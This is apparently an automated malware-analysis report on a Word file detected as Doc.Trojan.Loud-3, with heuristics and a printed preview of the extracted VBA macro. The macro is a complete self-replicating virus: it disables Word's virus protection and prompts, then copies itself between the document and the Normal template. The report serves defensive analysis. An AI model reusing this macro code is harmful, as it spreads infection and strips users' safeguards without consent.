MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV and contains VBA macros. The macros appear to manipulate the Normal.dot template and the document's own VBA project, potentially to embed further malicious code or establish persistence. The specific intent of the macro manipulation is unclear due to its obfuscated nature, but it is a common technique for malware.
Heuristics 2
-
ClamAV: Doc.Trojan.Loud-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Loud-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 792 bytes |
SHA-256: a14394de6fdd55d0a44fff09aea92324e36c6818a284850f56bab27b297359f9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Loud-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'1nternal
On Error GoTo Break
Set A = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set N = NormalTemplate.VBProject.VBComponents(1).CodeModule
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If N.Lines(2, 1) = "'1nternal" Then GoTo CheckA
For I = 1 To 19
N.InsertLines I, A.Lines(I, 1)
Next I
CheckA:
If A.Lines(2, 1) = "'1nternal" Then GoTo Break
For I = 1 To 19
A.InsertLines I, N.Lines(I, 1)
Next I
Break:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.